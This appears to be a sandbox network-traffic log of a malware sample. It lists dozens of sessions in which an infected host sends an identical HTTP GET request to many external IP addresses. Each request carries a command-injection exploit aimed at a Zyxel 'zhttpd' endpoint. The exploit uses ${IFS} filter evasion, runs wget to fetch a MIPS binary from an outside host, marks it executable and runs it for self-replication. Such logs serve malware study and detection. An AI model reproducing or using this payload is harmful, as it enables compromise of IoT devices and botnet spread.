                                                Jan 12, 2024 18:16:15.252471924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2377192.168.2.2333094131.218.142.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252513885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2378192.168.2.2339880155.55.63.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252554893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2379192.168.2.2355356189.247.53.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252605915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2380192.168.2.23467981.152.186.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252640963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2381192.168.2.2337968121.87.225.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252706051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2382192.168.2.233701463.36.227.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252752066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2383192.168.2.2335908184.167.37.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252804995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2384192.168.2.2344906136.205.67.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252866983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2385192.168.2.233763254.14.255.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252922058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2386192.168.2.2339630180.19.181.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252948999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2387192.168.2.235534687.83.201.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252980947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2388192.168.2.2357890150.24.230.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.252995014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2389192.168.2.234583085.66.35.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253051996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2390192.168.2.2343520100.202.254.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253098011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2391192.168.2.2338688106.148.81.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253149033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2392192.168.2.235845287.178.125.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253170967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2393192.168.2.23483462.246.143.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253220081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2394192.168.2.2336046157.79.141.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253252029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2395192.168.2.2337150204.213.239.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253285885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2396192.168.2.2352154198.67.107.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253317118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2397192.168.2.2344018196.9.156.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253365040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2398192.168.2.2357302142.184.62.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253387928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2399192.168.2.2346186106.159.112.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253426075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2400192.168.2.233860453.193.225.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253451109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2401192.168.2.23347685.188.23.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253520966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2402192.168.2.2337402223.72.136.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253556013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2403192.168.2.234832648.10.154.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253588915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2404192.168.2.234754282.172.255.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253599882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2405192.168.2.23476108.199.128.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253652096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2406192.168.2.235723234.90.134.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253705025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2407192.168.2.2354034164.129.229.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253757954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2408192.168.2.234462617.132.126.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253787041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2409192.168.2.2346994167.255.202.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253829002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2410192.168.2.234115614.139.128.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253870010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2411192.168.2.235934065.127.233.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253912926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2412192.168.2.2353890206.149.21.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.253973961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2413192.168.2.235715242.26.86.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254014015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2414192.168.2.2335814195.156.103.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254050016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2415192.168.2.2359618199.8.55.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254086971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2416192.168.2.2339900221.220.167.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254122972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2417192.168.2.2344972136.139.211.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254156113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2418192.168.2.235007831.49.155.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254195929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2419192.168.2.235407425.184.10.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254236937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2420192.168.2.2359588170.136.116.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254265070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2421192.168.2.2345110104.182.117.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254301071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2422192.168.2.2355474131.212.18.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254343987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2423192.168.2.2336624169.231.182.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254364967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2424192.168.2.2349980181.120.171.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254406929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2425192.168.2.235279483.152.237.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254431963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2426192.168.2.235948657.0.93.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254487038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2427192.168.2.2347824188.230.12.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254535913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2428192.168.2.2347958125.3.89.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254589081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2429192.168.2.235903692.51.81.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254642963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2430192.168.2.2355554138.161.132.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254689932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2431192.168.2.2357308151.68.76.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254724979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2432192.168.2.2353700119.100.195.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254786968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2433192.168.2.235473232.33.223.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254837036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2434192.168.2.2342198122.48.185.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254874945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2435192.168.2.234792617.147.130.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254919052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2436192.168.2.2346518105.131.91.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.254964113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2437192.168.2.235364477.20.0.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255002022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2438192.168.2.2358508144.66.218.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255045891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2439192.168.2.235516213.34.92.3443
                                                TimestampBytes transferredDirectionData
